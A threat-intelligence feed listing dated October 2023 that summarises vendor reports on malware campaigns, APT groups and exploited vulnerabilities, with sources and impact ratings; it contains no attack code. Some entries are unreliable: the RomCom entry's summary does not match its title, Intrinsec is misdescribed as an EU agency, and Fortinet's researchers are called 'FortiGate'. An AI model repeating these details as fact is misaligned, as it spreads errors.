- Iranian_Group_Tortoiseshell_Using_IMAPLoader_Malware
- Date of Scan:
- 2023-10-26
- Impact:
- MEDIUM
- Summary:
- A new wave of watering hole attacks intended to deliver a malware called IMAPLoader has been linked to the Iranian threat actor Tortoiseshell. “IMAPLoader is a .NET malware that has the ability to fingerprint victim systems using native Windows utilities and acts as a downloader for further payloads,” the statement reads.
—
- Intel Source:
- Cluster25
- Intel Name:
- LinkedIn_Based_Identity_Theft_Campaign_Leveraging_DuckTail_Malware
- Date of Scan:
- 2023-10-26
- Impact:
- LOW
- Summary:
- A recent campaign exploits compromised LinkedIn accounts to target Italian technology professionals, primarily in sales and finance roles. Attackers use LinkedIn messages to distribute fraudulent job offers with embedded malicious links that lead to phishing sites and deliver DuckTail malware. This malware steals browser data, including cookies and credentials, which are exfiltrated through a Telegram bot. The malware also facilitates Facebook Business hijacking.
Source:
https://blog.cluster25.duskrise.com/2023/10/25/the-duck-is-hiring
—
- Intel Source:
- WeliveSecurity
- Intel Name:
- The_Winter_Vivern_cyberespionage_operations
- Date of Scan:
- 2023-10-26
- Impact:
- LOW
- Summary:
- ESET researchers have been monitoring the operations of Winter Vivern for a long time and recently observed that the threat actors started exploiting a zero-day XSS vulnerability in the Roundcube Webmail server at the beginning of October 2023. ESET telemetry data showed the campaign’s targets are Roundcube Webmail servers belonging to governmental entities and a think tank, all in Europe.
—
- Intel Source:
- Netskope
- Intel Name:
- Menorah_malware_details
- Date of Scan:
- 2023-10-26
- Impact:
- LOW
- Summary:
- This month, Netskope analysts investigated a suspicious Word document containing malware dubbed “Menorah.” The malware was linked to the threat group APT34 and distributed via spear-phishing. The malicious Office file uses spread-out and obfuscated VBA code to evade detection.
Source:
https://www.netskope.com/blog/netskope-threat-coverage-menorah
—
- Intel Source:
- Malwarebytes
- Intel Name:
- Malvertising_campaigns_for_WhatsApp_and_Telegram
- Date of Scan:
- 2023-10-25
- Impact:
- LOW
- Summary:
- Malwarebytes investigated an increase in malicious webpages for the WhatsApp communication tool, driven via malicious Google ads. The suspicious sites they saw mimicked the web version of WhatsApp to trick victims into scanning a QR code to link a new device. The researchers also discovered another campaign using an ad for the messaging tool Telegram to lure victims into downloading a malicious version of the program. Again, this attack was targeted at residents of Hong Kong.
—
- Intel Source:
- Antiy CERT
- Intel Name:
- Active_WatchDog_mining_organization_samples_analyses
- Date of Scan:
- 2023-10-25
- Impact:
- MEDIUM
- Summary:
- This month, Antiy CERT obtained samples from the active WatchDog mining group. This group mainly attacks exposed Docker Engine API endpoints and Redis servers and can quickly move from an infected machine to the entire network. The WatchDog mining group started its activity in January 2019 and is still active today.
Source:
https://www.antiy.cn/research/notice&report/research_report/WatchDogTrojans_Analysis.html
—
- Intel Source:
- Talos
- Intel Name:
- Kazakhstan_associated_YoroTrooper_operators
- Date of Scan:
- 2023-10-25
- Impact:
- LOW
- Summary:
- Talos concluded that YoroTrooper operators are based in Kazakhstan, based on their language use and their use of Kazakhstani currency; their targeting within Kazakhstan included only the government’s Anti-Corruption Agency.
Source:
https://blog.talosintelligence.com/attributing-yorotrooper/
—
- Intel Source:
- The Hacker News
- Intel Name:
- North_Korean_IT_Scammers_Defrauding_Global_Businesses
- Date of Scan:
- 2023-10-25
- Impact:
- MEDIUM
- Summary:
- The Republic of Korea and the U.S. announced their seizure of 17 website domains used by North Korean information technology (IT) workers as part of an illegal scheme to defraud businesses across the world, evade sanctions, and fund the country’s ballistic missile program.
Source:
https://thehackernews.com/2023/10/us-doj-cracks-down-on-north-korean-it_20.html
—
- Intel Source:
- Securelist
- Intel Name:
- Attacks_on_Russian_Federation_Government_And_Industrial_Sectors
- Date of Scan:
- 2023-10-25
- Impact:
- MEDIUM
- Summary:
- Researchers have found several malicious programs whose goal is data theft. Because Kaspersky Threat Intelligence reports that similar programs have been discovered in a number of other government and industrial entities in the Russian Federation, they presume that the attackers’ primary objective is to steal data from companies in these industries.
Source:
https://securelist.ru/ataki-na-industrialnyj-i-gosudarstvennyj-sektory-rf/108229/
—
- Intel Source:
- Cert.Pl
- Intel Name:
- Deworming_the_XWorm_malware
- Date of Scan:
- 2023-10-24
- Impact:
- LOW
- Summary:
- CERT.PL shared a post with a detailed analysis and walk-through of the reverse-engineering process for a malware family called XWorm. XWorm is a multi-purpose malware family, commonly used as a RAT.
Source:
https://cert.pl/en/posts/2023/10/deworming-the-xworm/
—
- Intel Source:
- Gdatasoftware
- Intel Name:
- Facebook_malicious_Ads
- Date of Scan:
- 2023-10-24
- Impact:
- LOW
- Summary:
- Threat actors take advantage of business accounts on Facebook and run their own advertising campaigns in someone else’s name and at the expense of those affected. Gdatasoftware shared their analysis and a closer look at one such case here.
Source:
https://www.gdatasoftware.com/blog/2023/10/37814-meta-hijacked-malicious-ads
—
- Intel Source:
- Securityscorecard
- Intel Name:
- Deep_analysis_of_Cactus_ransomware
- Date of Scan:
- 2023-10-24
- Impact:
- LOW
- Summary:
- SecurityScorecard researchers shared their detailed analysis of Cactus ransomware, which was first discovered in March 2023. The malware creates a mutex called “b4kr-xr7h-qcps-omu3cAcTuS” to ensure that only one copy is running at a time. Persistence is achieved by creating a scheduled task named “Updates Check Task”. The ransomware requires an AES key to decrypt the encrypted public RSA key stored in the binary.
Source:
https://securityscorecard.com/research/deep-dive-into-cactus-ransomware/
—
- Intel Source:
- Securelist
- Intel Name:
- New_Lumar_stealer_and_Rhysida_ransomware
- Date of Scan:
- 2023-10-24
- Impact:
- MEDIUM
- Summary:
- Securelist analyzed the details on malware that has been active this year: the GoPIX stealer that attacks the PIX payment system, which is popular in Brazil; the Lumar multipurpose stealer advertised on the dark web; and the Rhysida ransomware supporting old Windows versions.
Source:
https://securelist.com/crimeware-report-gopix-lumar-rhysida/110871/
—
- Intel Source:
- Any Run
- Intel Name:
- The_use_of_Steganography_in_recent_malware_attacks
- Date of Scan:
- 2023-10-24
- Impact:
- LOW
- Summary:
- Any.Run analysts recently spotted a surge in the use of steganography in cyber attacks and share the details in their blog. Steganography hides data within another file or medium, effectively making it invisible.
Source:
https://any.run/cybersecurity-blog/steganography-in-malware-attacks/
—
- Intel Source:
- Uptycs
- Intel Name:
- Quasar_RAT_Using_Side_Loading_DLL_Methods
- Date of Scan:
- 2023-10-23
- Impact:
- LOW
- Summary:
- To accomplish its goals, the Quasar RAT uses a method called DLL side-loading, which entails utilizing trusted Microsoft files like “calc.exe” and “ctfmon.exe.” This method takes advantage of the built-in trust that these files have in the Windows environment.
—
- Intel Source:
- Intrinsec
- Intel Name:
- Lumma_Stealer_multiple_campaigns
- Date of Scan:
- 2023-10-23
- Impact:
- MEDIUM
- Summary:
- A report on Lumma Stealer, a malware-as-a-service sold through Telegram and Russian-speaking forums, has been published by the European Union’s cyber security agency, Intrinsec.
—
- Intel Source:
- Cyfirma
- Intel Name:
- A_Python_Based_Info_stealer_Akira
- Date of Scan:
- 2023-10-23
- Impact:
- LOW
- Summary:
- Cyfirma analysts provided a comprehensive investigation report of this Akira information stealer malware, unfolding its functionality and capabilities.
Source:
https://www.cyfirma.com/outofband/akira-stealer-an-undetected-python-based-info-stealer/
—
- Intel Source:
- Okta
- Intel Name:
- Customer_Data_Exposed_by_Okta_Support_System_Breach
- Date of Scan:
- 2023-10-23
- Impact:
- LOW
- Summary:
- The identity services company Okta has revealed a fresh security incident in which unknown threat actors gained access to its support case management system using credentials that they had stolen. Note that the Okta support case management system is distinct from the production Okta service, which is up and running and unaffected. The threat actor was able to examine files uploaded by specific Okta customers as part of recent support cases.
Source:
https://sec.okta.com/harfiles
—
- Intel Source:
- Anomali
- Intel Name:
- RomCom_4_0_Targeted_Female_Politicians
- Date of Scan:
- 2023-10-21
- Impact:
- LOW
- Summary:
- The article discusses the US Health Sector Cybersecurity Coordination Center’s report on the NoEscape ransomware, ShellBot DDoS bot, and Tropical ScorpiusVoid cyberespionage group. It recommends having a comprehensive and tested backup solution, running the most current software version, and practicing defense-in-depth. It also lists various MITRE ATT&CK techniques and tags associated with each threat.
—
- Intel Source:
- SentinelOne
- Intel Name:
- Traditional_and_modern_threat_hunting_methodologies
- Date of Scan:
- 2023-10-21
- Impact:
- LOW
- Summary:
- This article discusses traditional and modern threat hunting methodologies, emphasizing the need for experienced professionals and effective tooling. It provides examples of successful hunts, such as the SolarWinds SERV-U Vulnerability and the Akira ransomware campaign, and outlines the use of advanced tools, AI/machine learning algorithms, and threat intelligence integration.
Source:
https://www.sentinelone.com/blog/a-modern-approach-to-adaptive-threat-hunting-methodologies/
—
- Intel Source:
- Trellix
- Intel Name:
- The_analyzes_of_malware_that_abuses_Discord_infrastructure
- Date of Scan:
- 2023-10-21
- Impact:
- LOW
- Summary:
- Malicious actors are using Discord’s Content Delivery Network (CDN) and webhooks to download additional files and exfiltrate information. A sample targeting Ukrainian critical infrastructures was recently discovered, indicating that APT groups may be using Discord. Technical analysis of the sample was provided, along with detection and IoCs. Loaders written in .NET are the most popular malware families using Discord’s CDN, and function-level retro-hunting was used to identify them.
Source:
https://www.trellix.com/en-au/about/newsroom/stories/research/discord-i-want-to-play-a-game/
—
- Intel Source:
- withsecure
- Intel Name:
- DarkGate_malware_infection_attempts
- Date of Scan:
- 2023-10-20
- Impact:
- LOW
- Summary:
- This article discusses the DarkGate malware campaign, which is related to the Ducktail campaigns and is conducted by Vietnamese cybercrime groups. It focuses on the use of multiple different MaaS infostealers and RATs to target the digital marketing sector, with the primary goal of hijacking Facebook business accounts. It provides details on the detection of the DarkGate malware infection attempts, the lures and delivery methods used, and the use of MSI Wrapper to wrap executable files in MSI bundles.
Source:
https://labs.withsecure.com/publications/darkgate-malware-campaign
—
- Intel Source:
- Cyble
- Intel Name:
- Italian_Clipper
- Date of Scan:
- 2023-10-20
- Impact:
- LOW
- Summary:
- CRIL recently uncovered a malicious phishing campaign orchestrated by a threat actor targeting Italian-speaking users. The campaign employed various techniques, including droppers, obfuscators, crypters, fileless malware, crypto address theft, and exfiltration via Discord. The malware, Pure Clipper, was designed to steal or manipulate cryptocurrency-related data, such as wallet addresses. The threat actor used a .NET dropper concealed by SmartAssembly, which included a legitimate Tor Installer and a PureCrypter binary. The Clipper was designed to steal cryptocurrency addresses and interact with the TA’s Command and Control (C&C) system through Discord. The operation also showcased persistence through Registry manipulation and Task Scheduler entries.
Source:
https://cyble.com/blog/fileless-pure-clipper-malware-italian-users-in-the-crosshairs/
—
- Intel Source:
- Fortinet
- Intel Name:
- A_Novel_Low_Cost_Cybercrime_Tool_Is_Introduced
- Date of Scan:
- 2023-10-20
- Impact:
- LOW
- Summary:
- Researchers from FortiGate have discovered that ExelaStealer is essentially an open-source InfoStealer that the threat actor can customize for a fee. Although it uses resources from other languages (like JavaScript) when necessary, it is written in Python. Sensitive data, including credit card numbers, passwords, cookies, session data, and basic keylogging, can be stolen from a Windows-based host.
Source:
https://www.fortinet.com/blog/threat-research/exelastealer-infostealer-enters-the-field
—
- Intel Source:
- vmware
- Intel Name:
- An_Analysis_of_Malware_as_a_Service_on_the_Dark_web
- Date of Scan:
- 2023-10-20
- Impact:
- LOW
- Summary:
- LummaStealer is a Malware-as-a-Service (MaaS) available on the dark web that has been observed evolving from underground platforms to more public hacker forums. This article explores the history of LummaStealer and its attack vectors, including the distribution of the malware through deceptive sites, drive-by downloads, and masquerading as browser updates. It also discusses LummaStealer’s dark web presence, multiple sellers, and Russian origin.
Source:
https://blogs.vmware.com/security/2023/10/an-ilummanation-on-lummastealer.html
—
- Intel Source:
- Palo Alto
- Intel Name:
- A_New_Tactic_For_BlackCat_Ransomware
- Date of Scan:
- 2023-10-20
- Impact:
- LOW
- Summary:
- Researchers at Palo Alto have noticed that the BlackCat/ALPHV ransomware operation has started to use a new tool called “Munchkin,” which uses virtual machines to covertly install encryptors on network devices. Munchkin makes it possible for BlackCat to operate on remote systems and encrypt network shares such as Common Internet File System (CIFS) or Server Message Block (SMB).
—
- Intel Source:
- Malwarebytes
- Intel Name:
- Fake_KeePass_Site_Leveraging_Google_Ads_and_Punycode_to_Spread_Malware
- Date of Scan:
- 2023-10-20
- Impact:
- LOW
- Summary:
- Researchers at Malwarebytes discovered a highly deceptive malicious Google ad for the open-source password manager KeePass. They have already written on how tracking templates have made it easier to impersonate brands, but this attack added another degree of deceit.
—
- Intel Source:
- Sophos
- Intel Name:
- Ransomware_actor_attacks_unsupported_ColdFusion_servers
- Date of Scan:
- 2023-10-19
- Impact:
- MEDIUM
- Summary:
- An unknown actor attempted to deploy ransomware on obsolete Adobe ColdFusion servers using leaked LockBit 3.0 source code. Sophos X-Ops blocked the attack with endpoint behavioral detections. The attacker left a directory listing of artifacts and hashes, which revealed the intended ransomware payload. The ransom note credited “BlackDog 2023” and demanded 205 Monero.
—
- Intel Source:
- Cado Security
- Intel Name:
- Qubitstrike_Targeting_Jupyter_Notebooks
- Date of Scan:
- 2023-10-19
- Impact:
- LOW
- Summary:
- A threat actor linked to a recent effort that targets unprotected Jupyter Notebooks is likely from Tunisia. The campaign aims to compromise cloud infrastructures and mine cryptocurrencies illegally. The Qubitstrike campaign’s payloads are all hosted on codeberg.org, a substitute Git hosting service that offers a lot of the same features as GitHub.
Source:
https://www.cadosecurity.com/qubitstrike-an-emerging-malware-campaign-targeting-jupyter-notebooks/
—
- Intel Source:
- Cyble
- Intel Name:
- BbyStealer_malware_campaign_resurfaces
- Date of Scan:
- 2023-10-19
- Impact:
- LOW
- Summary:
- Cyble researchers have discovered malware that uses multiple phishing domains to target users who are downloading Virtual Private Network (VPN) Windows applications. In this campaign, the downloaded VPN application is used to disseminate an information-stealing malware known as “BbyStealer.”
Source:
https://cyble.com/blog/bbystealer-malware-resurfaces-sets-sights-on-vpn-users/
—
- Intel Source:
- Kaspersky
- Intel Name:
- Updated_MATA_Targeting_Eastern_European_Industrial_Firms
- Date of Scan:
- 2023-10-19
- Impact:
- MEDIUM
- Summary:
- The attackers targeted a number of victims with spear-phishing emails; some of them downloaded files using an internet browser and became infected with Windows executable malware. A link to an external page that downloads a remote page with the CVE-2021-26411 vulnerability can be found in every phishing document. Through September 2022, the attackers persisted in sending infected documents over email. The campaign ran for a total of six months, ending in May 2023.
—
- Intel Source:
- Securelist
- Intel Name:
- The_new_threat_to_B2B
- Date of Scan:
- 2023-10-19
- Impact:
- LOW
- Summary:
- Malicious executable IntelSvc.exe is capable of executing commands, creating folders, and storing configuration files and logs. The conclusion emphasizes the importance of strong security systems in the B2B sector, as cybercriminals are constantly looking for ways to exploit resources for financial gain. Statistics show that since May 2023, over 200 users worldwide have been targeted, with the most frequent attacks occurring in Russia, Saudi Arabia, Vietnam, Brazil, and Romania. Money-making scripts use infected devices to mine Monero cryptocurrency, a keylogger to track keystrokes, and a backdoor to send requests to the C2 server.
Source:
https://securelist.com/miner-keylogger-backdoor-attack-b2b/110761/
—
- Intel Source:
- Google Blog
- Intel Name:
- State_Actors_Targeting_WinRAR_Flaw_In_Multiple_Campaigns
- Date of Scan:
- 2023-10-19
- Impact:
- MEDIUM
- Summary:
- Google Threat Analysis Group has seen numerous government-sponsored hacking groups taking advantage of WinRAR, a well-known file archiver program for Windows, and its known vulnerability, CVE-2023-38831. When the flaw was still unknown to defenders in early 2023, cybercrime groups started taking advantage of it. Although a fix is now available, many users appear to still be at risk. TAG has seen government-backed actors from several nations exploiting the WinRAR vulnerability in their activities.
Source:
https://blog.google/threat-analysis-group/government-backed-actors-exploiting-winrar-vulnerability/
—
- Intel Source:
- Malwarebytes
- Intel Name:
- Hackers_Using_Google_Ads_to_Distribute_Weaponized_Notepad
- Date of Scan:
- 2023-10-19
- Impact:
- LOW
- Summary:
- It is well known that cybercriminals use deceptive advertising strategies to target the popular Windows text editor Notepad++. This can result in malware and ransomware spreading. It seems to have totally escaped detection for at least a few months, according to Malwarebytes. Its capacity to distribute time-sensitive payloads and collect user fingerprints makes it special.
Source:
https://www.malwarebytes.com/blog/threat-intelligence/2023/10/the-forgotten-malvertising-campaign
—
- Intel Source:
- Microsoft
- Intel Name:
- Hackers_From_North_Korea_Exploiting_TeamCity_Vulnerability
- Date of Scan:
- 2023-10-19
- Impact:
- MEDIUM
- Summary:
- Researchers at Microsoft have discovered that two nation-state threat actors from North Korea, known as Diamond Sleet and Onyx Sleet, are taking advantage of CVE-2023-42793, a remote-code execution vulnerability that affects several JetBrains TeamCity server versions. Organizations utilize TeamCity, a continuous integration/continuous deployment (CI/CD) platform, for DevOps and other software development tasks.
—
- Intel Source:
- Symantec
- Intel Name:
- Crambus_Hackers_Targeting_Middle_Eastern_Government
- Date of Scan:
- 2023-10-19
- Impact:
- MEDIUM
- Summary:
- Between February and September of 2023, the Iranian Crambus espionage group (also known as OilRig, MuddyWater, and APT34) orchestrated an eight-month-long incursion against a Middle Eastern nation. In one instance, the attackers installed a PowerShell backdoor called PowerExchange, which is utilized to monitor incoming emails sent from an Exchange server in order to execute commands sent by the attackers in the form of emails and covertly forward results to the attackers. The attackers also stole files and passwords during the compromise. At least 12 machines saw malicious activity, and there is proof that the attackers installed backdoors and keyloggers on numerous additional computers.
—
- Intel Source:
- Elastic
- Intel Name:
- A_New_Backdoor_Targeting_ASEAN_Organizations_And_Governments
- Date of Scan:
- 2023-10-18
- Impact:
- MEDIUM
- Summary:
- The innovative BLOODALCHEMY backdoor, which is part of the REF5961 intrusion set employed by a China-linked threat operation, is being utilized to attack x86 systems belonging to governments and other organizations that are members of the Association of Southeast Asian Nations.
Source:
https://www.elastic.co/security-labs/disclosing-the-bloodalchemy-backdoor
—
- Intel Source:
- Vulncheck
- Intel Name:
- Vulnerabilities_in_Milesight_Industrial_Cellular_Routers
- Date of Scan:
- 2023-10-18
- Impact:
- LOW
- Summary:
- A recent disclosure of CVE-2023-43261 highlights vulnerabilities in Milesight’s industrial cellular routers, potentially exposing industrial control system (ICS) networks to the internet. This article explores how these routers are used in various critical infrastructure scenarios, the specifics of the vulnerability, and the extent of its impact in the wild. While the CVE description is misleading, we find that the actual number of vulnerable routers in the wild is relatively low. Nonetheless, some evidence suggests that exploitation is likely occurring, although not at a large scale.
Source:
https://vulncheck.com/blog/real-world-cve-2023-43261
—
- Intel Source:
- Welivesecurity
- Intel Name:
- A_Global_View_of_LATAM_Threats
- Date of Scan:
- 2023-10-18
- Impact:
- LOW
- Summary:
- Researchers from ESET have discovered an increase in evasion techniques and high-value targets in threats affecting the LATAM region.
Source:
https://www.welivesecurity.com/en/eset-research/operation-king-tut-universe-threats-latam/
—
- Intel Source:
- ASEC
- Intel Name:
- Kimsuky_Threat_Group_Controls_Infected_Systems_Using_RDP
- Date of Scan:
- 2023-10-18
- Impact:
- LOW
- Summary:
- Researchers from ASEC have been keeping an eye on recent incidents in which the Kimsuky group allegedly used spear phishing to install BabyShark before putting various RDP-related malware strains in place. The tools employed in the attacks share characteristics with those in earlier occurrences; however, based on their PDB information, it is assumed that they were very recently built for attack usage.
—
- Intel Source:
- Symantec
- Intel Name:
- Grayling_new_threat_actor_targets_organizations_in_Taiwan
- Date of Scan:
- 2023-10-18
- Impact:
- LOW
- Summary:
- A new advanced persistent threat group was observed using custom malware and multiple publicly available tools to target a number of organizations in the manufacturing, IT, and biomedical sectors in Taiwan. The Symantec Threat Hunter Team linked this activity to a new group it is calling Grayling. This activity stood out due to Grayling’s use of a distinctive DLL sideloading technique that uses a custom decryptor to deploy payloads.
—
- Intel Source:
- Cisco Talos
- Intel Name:
- Cisco_Discovers_Critical_Vulnerability_Exploitation_in_IOS_XE_Software
- Date of Scan:
- 2023-10-18
- Impact:
- MEDIUM
- Summary:
- Cisco has detected active exploitation of a critical vulnerability (CVE-2023-20198) in the Web User Interface feature of Cisco IOS XE software, potentially giving attackers full control of affected devices. Suspicious activity was first observed on September 18, with an implant deployed on October 12. Cisco advises immediate action to mitigate this threat, including disabling the HTTP server on internet-facing systems.
Source:
https://blog.talosintelligence.com/active-exploitation-of-cisco-ios-xe-software/
—
- Intel Source:
- Securelist
- Intel Name:
- Analysis_of_Alleged_Hack_of_Israeli_Power_Station_Amid_Ongoing_Conflict
- Date of Scan:
- 2023-10-18
- Impact:
- LOW
- Summary:
- The text delves into the cyber activities associated with the Israel-Hamas conflict, including distributed denial-of-service (DDoS) attacks, information warfare, and hacktivism campaigns. It highlights a recent purported hack of the Dorad private power station by a group called Cyber Av3ngers. However, upon analysis, the data presented by Cyber Av3ngers was found to be sourced from an older breach by a separate hacktivist group known as Moses Staff. Moses Staff, allegedly an Iranian hacker group, primarily targets Israeli companies and other organizations globally.
Source:
https://securelist.com/a-hack-in-hand-is-worth-two-in-the-bush/110794/
—
- Intel Source:
- Paloaltonetworks
- Intel Name:
- XorDDoS_Trojan_Campaign
- Date of Scan:
- 2023-10-18
- Impact:
- MEDIUM
- Summary:
- Palo Alto Networks researchers spotted a recent campaign involving the XorDDoS Trojan, which has drawn attention as attackers manipulate Linux devices to execute remote malicious activities. In this report, an in-depth investigation reveals concealed command and control (C2) network infrastructure, showcasing a shift towards legitimate public hosting services.
Source:
https://unit42.paloaltonetworks.com/new-linux-xorddos-trojan-campaign-delivers-malware/
—
- Intel Source:
- Wordfence
- Intel Name:
- Critical_Unauthenticated_Arbitrary_File_Upload_Vulnerability
- Date of Scan:
- 2023-10-17
- Impact:
- LOW
- Summary:
- The Royal Elementor Addons and Templates WordPress plugin is used by over 200,000 websites. The Wordfence Threat Intelligence Team discovered a vulnerability in the plugin that was recently patched, allowing unauthenticated attackers to upload any file to a compromised website.
—
- Intel Source:
- Aitime.Space
- Intel Name:
- Phishing_abuse_the_marketing_tool_Smart_Links
- Date of Scan:
- 2023-10-17
- Impact:
- LOW
- Summary:
- Aitime news shared information about an attack, not the first of its kind, that abuses Smart Links. This time the threat actor used more advanced steps, using the URL of such a tool to carry the recipient’s email address into the URL of the phishing website.
—
- Intel Source:
- SentinelOne
- Intel Name:
- Examining_In_Depth_Dark_Angels_Ransomware
- Date of Scan:
- 2023-10-17
- Impact:
- LOW
- Summary:
- Researchers from SentinelOne have provided technical information about the Dark Angels ransomware, compared samples of RagnarLocker and Dark Angels, and offered advice for security teams protecting ESXi servers.
—
- Intel Source:
- QuickHeal
- Intel Name:
- Diving_Deep_into_MedusaLocker_Ransomware
- Date of Scan:
- 2023-10-17
- Impact:
- LOW
- Summary:
- Researchers at QuickHeal have examined and offered defense tactics against the ransomware known as MedusaLocker, which initially appeared in the middle of 2019. The hospital and healthcare sectors are its main targets. MedusaLocker encrypts the data of its victims using RSA and AES encryption methods.
—
- Intel Source:
- Cluster25
- Intel Name:
- Pro_Russian_Hackers_Exploiting_WinRAR_Vulnerability
- Date of Scan:
- 2023-10-17
- Impact:
- MEDIUM
- Summary:
- A newly discovered security flaw in the WinRAR archiving tool has been taken advantage of by pro-Russian hacker groups as part of a phishing effort aimed at obtaining login credentials from compromised systems. The attack uses malicious archive files to exploit a recently identified vulnerability (CVE-2023-38831) that affects WinRAR compression software versions older than 6.23.
Source:
https://blog.cluster25.duskrise.com/2023/10/12/cve-2023-38831-russian-attack
—
- Intel Source:
- Cloudflare
- Intel Name:
- Malicious_Impersonation_and_Data_Theft_attack_Targeting_RedAlert
- Date of Scan:
- 2023-10-17
- Impact:
- LOW
- Summary:
- Cloudflare’s Cloudforce One Threat Operations Team discovered a malicious website impersonating the RedAlert – Rocket Alerts application, which provides crucial alerts about incoming airstrikes in Israel. This attack comes in the wake of recent cyber threats against rocket alert applications used in the region. The malicious website offered a fake Android version of the RedAlert app that, when downloaded, collected sensitive user data. We provide an analysis of the malicious APK’s capabilities and the methods it uses to avoid detection.
—
- Intel Source:
- Trellix
- Intel Name:
- The_New_Frontier_of_Evasive_Attacks
- Date of Scan:
- 2023-10-17
- Impact:
- LOW
- Summary:
- Malicious actors have escalated the use of QR codes in phishing campaigns to bypass email security products. The blog delves into two distinct attack campaigns, each utilizing QR codes for evasion. Campaign 1 targets Microsoft Account holders, employing QR codes in email bodies to trick victims. Campaign 2 capitalizes on Chinese Government subsidy claims with QR codes embedded directly in emails.
—
- Intel Source:
- Proofpoint
- Intel Name:
- The_State_of_Current_Fake_Browser_Updates
- Date of Scan:
- 2023-10-17
- Impact:
- LOW
- Summary:
- The numerous threat clusters that use fake browser update-related themes are being monitored by Proofpoint. False browser updates take advantage of consumers’ confidence by using compromised websites and a bait that is specific to each user’s browser to make the update appear legitimate and trick users into clicking.
—
- Intel Source:
- Trend Micro
- Intel Name:
- Lumma_Stealers_Stealthy_Invasion
- Date of Scan:
- 2023-10-17
- Impact:
- LOW
- Summary:
- Researchers at Trend Micro have found that cybercriminals are leveraging Discord, a popular chat platform among gamers and content creators, to distribute the information-stealing malware known as Lumma Stealer. Malicious actors manipulate Discord’s infrastructure to host and spread this malware while using the platform’s API to create bots for remote control.
—
- Intel Source:
- CERT-UA
- Intel Name:
- Ukrainian_Providers_Are_Target_of_Destructive_Cyberattacks
- Date of Scan:
- 2023-10-16
- Impact:
- LOW
- Summary:
- Public sources state that between May 11, 2023, and September 27, 2023, an organized group of attackers, tracked under the identifier UAC-0165, interfered with the information and communication systems (ICS) of no fewer than 11 Ukrainian telecommunications providers. Among other things, this disrupted the provision of services to customers.
—
- Intel Source:
- Cofense
- Intel Name:
- Voice_Message_Phishing_Campaigns_Access_Key
- Date of Scan:
- 2023-10-16
- Impact:
- LOW
- Summary:
- Researchers at Cofense have seen a phishing effort in which the attackers used an access key in the body of the message to lure the victim into listening to the voicemail that had been left for them to review.
Source:
https://cofense.com/blog/access-key-used-in-voice-messaged-phishing/
—
- Intel Source:
- Guard Labs
- Intel Name:
- EtherHiding_Malware_Campaign_Takes_Advantage_of_Binances_Smart_Chain
- Date of Scan:
- 2023-10-16
- Impact:
- LOW
- Summary:
- Using Binance’s Smart Chain (BSC) contracts, threat actors have been seen delivering malware in what has been called the “next level of bulletproof hosting.” Guardio Labs has given the campaign, which was discovered two months ago, the name EtherHiding.
Source:
https://labs.guard.io/etherhiding-hiding-web2-malicious-code-in-web3-smart-contracts-65ea78efad16
—
- Intel Source:
- CISA
- Intel Name:
- Exploit_of_Atlassian_Confluence_CVE_2023_22515
- Date of Scan:
- 2023-10-16
- Impact:
- HIGH
- Summary:
- Today, CISA, FBI, and MS-ISAC shared a Cybersecurity Advisory about the active exploitation of CVE-2023-22515. This vulnerability affects some versions of Atlassian Confluence Data Center and Server and lets threat actors gain initial access to Confluence instances by creating unauthorized Confluence administrator accounts. It was exploited as a zero-day to obtain access to victim systems, and exploitation continues. It was rated a critical vulnerability, and the agencies expect widespread, continued exploitation due to its ease of exploitation.
Source:
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-289a
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Domain_Name_Recorded_by_DShield_Sensor_as_Password
- Date of Scan:
- 2023-10-16
- Impact:
- LOW
- Summary:
- SANS researchers have discovered something unusual in the list of the Top Usernames and Passwords—multiple domain names were used as passwords—for the first time. At first, they thought there might have been a mistake in Logstash’s processing, so they looked over the raw logs to make sure everything was processed correctly and to ensure data integrity.
Source:
https://isc.sans.edu/diary/Domain+Name+Used+as+Password+Captured+by+DShield+Sensor/30312/
—
- Intel Source:
- Phylum
- Intel Name:
- Malicious_NuGet_Package_Using_SeroXen_RAT_to_Target_DotNET_Developers
- Date of Scan:
- 2023-10-13
- Impact:
- LOW
- Summary:
- Researchers from Phylum have identified a malicious package hosted on the .NET Framework’s NuGet package manager that distributes the remote access trojan SeroXen RAT.
Source:
https://blog.phylum.io/phylum-discovers-seroxen-rat-in-typosquatted-nuget-package/
—
- Intel Source:
- Trend Micro
- Intel Name:
- Void_Rabisu_Targeting_Female_Political_Leaders
- Date of Scan:
- 2023-10-13
- Impact:
- LOW
- Summary:
- Researchers at Trend Micro have found that Void Rabisu is still working on its primary piece of malware, the ROMCOM backdoor, nearly a year after shifting its focus from opportunistic attacks with ransomware to cyberespionage.
—
- Intel Source:
- Cyble
- Intel Name:
- AgentTesla_attacks_via_CHM_and_PDF_Files
- Date of Scan:
- 2023-10-13
- Impact:
- LOW
- Summary:
- In a recent attack campaign, Cyble researchers discovered a CHM file that had been compressed using Gzip and was probably delivered via malicious spam email. The malicious CHM file acts as a trap. Based on the content of the CHM file, it targets individuals or entities involved in network engineering, telecommunications, or information technology.
Source:
https://cyble.com/blog/agenttesla-spreads-through-chm-and-pdf-files-in-recent-attacks/
—
- Intel Source:
- ASEC
- Intel Name:
- Volgmer_and_Scout_Malware_Analysis_Report_from_Lazarus_Threat_Group
- Date of Scan:
- 2023-10-13
- Impact:
- LOW
- Summary:
- ASEC researchers have examined the first discovered version of the Volgmer backdoor as well as the subsequent version that started to be used in attacks in 2017. The report then examines the Scout downloader and discusses the dropper that was used for the Scout installation.
—
- Intel Source:
- Trend Micro
- Intel Name:
- DarkGate_Allows_Attacks_Using_Teams_and_Skype
- Date of Scan:
- 2023-10-13
- Impact:
- MEDIUM
- Summary:
- Researchers from Trend Micro have been keeping an eye on a campaign that exploits Teams and Skype to spread the DarkGate malware to certain companies. They also found that additional payloads were delivered into the environment once DarkGate was installed on the victim’s system.
—
- Intel Source:
- Checkpoint
- Intel Name:
- STAYIN_ALIVE_Targeting_Government_Ministries_and_Telecoms_in_Asia
- Date of Scan:
- 2023-10-12
- Impact:
- MEDIUM
- Summary:
- “Stayin’ Alive” is a campaign that Check Point Research has been monitoring since at least 2021. The campaign is active in Asia and mainly targets government agencies and the telecom sector. The majority of the “Stayin’ Alive” toolset is made up of downloaders and loaders, some of which are employed as first-stage infection vectors against well-known Asian companies.
—
- Intel Source:
- Securelist
- Intel Name:
- ToddyCat_an_advanced_APT_actor
- Date of Scan:
- 2023-10-12
- Impact:
- LOW
- Summary:
